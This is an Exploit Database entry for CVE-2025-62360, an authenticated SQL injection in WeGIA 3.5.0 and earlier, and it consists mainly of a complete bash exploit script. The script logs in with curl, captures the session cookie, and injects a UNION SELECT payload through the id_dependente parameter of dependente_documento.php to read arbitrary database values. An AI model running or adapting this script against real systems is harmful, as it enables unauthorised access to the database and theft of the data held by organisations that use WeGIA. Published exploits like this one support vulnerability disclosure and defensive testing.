This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING WeGIA 3.5.0 - SQL Injection EDB-ID: 52483 CVE: 2025-62360 EDB Verified: Author: ONURDEMIR Type: WEBAPPS Exploit: / Platform: PHP Date: 2026-03-03 Vulnerable App: # Exploit Title: WeGIA 3.5.0 - SQL Injection # Date: 2025-10-14 # Exploit Author: Onur Demir (OnurDemir-Dev) # Vendor Homepage: https://www.wegia.org # Software Link: https://github.com/LabRedesCefetRJ/WeGIA/ # Version: <=3.5.0 # Tested on: Local Linux (localhost/127.0.0.1) # CVE : CVE-2025-62360 # Advisory / Reference: https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mwvv-q9gh-gwxm # Notes: Run this script ONLY on a local/test instance you own or are authorized to test. # ============================================================ if [ -z "$4" ]; then # Usage prompt if required arguments are missing echo "Usage: $0 <target-url> <user> <password> <payload>" echo "Example: $0 http://127.0.0.1/WeGIA/ \"admin\" \"wegia\" \"version()\"" exit 1 fi url="$1" user="$2" pass="$3" payload="$4" # Check if URL format is valid (basic regex) # This is a basic sanity check for the URL string format. if ! [[ "$url" =~ ^http?://[a-zA-Z0-9._-]+ ]]; then echo "⚠️ Invalid URL format: $url" exit 1 fi # Perform login request (multipart/form) # -s silent, -w "%{http_code}" will append HTTP code to response # -D - prints response headers to stdout, combined with body in login_response login_response=$(curl -s -w "%{http_code}" "$url/html/login.php" \ -D - \ -X POST \ -F "cpf=${user}"\ -F "pwd=${pass}") # Extract last 3 chars as HTTP status code from the combined response login_status_code="${login_response: -3}" # If login did not return a 302 redirect, handle error cases if [ "$login_status_code" -ne 302 ]; then # If curl couldn't connect, curl may return 0 or empty status code if [ "$login_status_code" -eq 0 ] || [ -z "$login_status_code" ]; then echo "❌ Unable to reach URL: $url" exit 1 fi # Otherwise report unexpected login status echo "Error: Received HTTP status code from login: $login_status_code" exit 1 fi # Extract the Location header from the login response headers # Using awk to find the first Location header (case-insensitive) login_location=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Location:/{print substr($0, index($0,$2)); exit}' | tr -d '\r') # Check username and password correctness using Location header content # If the Location does not include home.php, consider login failed. if [[ "$login_location" != *"home.php"* ]]; then # If Location contains "erro" assume wrong credentials; otherwise unknown error if [[ "$login_location" == *"erro"* ]]; then echo "Error: Wrong username or password!" else echo "Error: Unknown Error!" fi exit 1 fi # Extract Set-Cookie header (first cookie) and keep only "name=value" # tr -d '\r' removes possible CR characters set_cookie=$(echo "$login_response" | awk -F': ' 'BEGIN{IGNORECASE=1} /^Set-Cookie:/{print substr($0, index($0,$2)); exit}' | tr -d '\r') set_cookie=$(echo "$set_cookie" | cut -d';' -f1) #Exploit Vulnarbility # (The following performs the SQL injection request using the cookie obtained above) # The payload variable is used verbatim in the id_dependente parameter. # Ensure payload is provided safely in the script invocation and that you are authorized to test. # Execute the curl command and capture the output and status code response=$(curl -s -w "%{http_code}" "$url/html/funcionario/dependente_documento.php" -d "id_dependente=1 UNION+SELECT 'a','b',$payload;#" -b "$set_cookie;" -H "Content-Type: application/x-www-form-urlencoded") # Extract the HTTP status code (last 3 characters) status_code="${response: -3}" # Extract the body (everything except the last 3 characters) body="${response:0:-3}" # If the exploit request returned HTTP 200, try to extract id_doc if [ "$status_code" -eq 200 ]; then # Prefer a robust JSON extractor if available; this line uses grep -Po to capture the id_doc value including quotes. # Note: This grep returns the quoted string (e.g. "11.8.3-MariaDB-1+b1 from Debian"). clear_response=$(echo "$body" | grep -Po '"id_doc": *\K"[^"]*"') # Print the extracted value (or empty if not found) echo "$clear_response" else # Non-200 status handling echo "Error: Received HTTP status code $status_code" fi Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.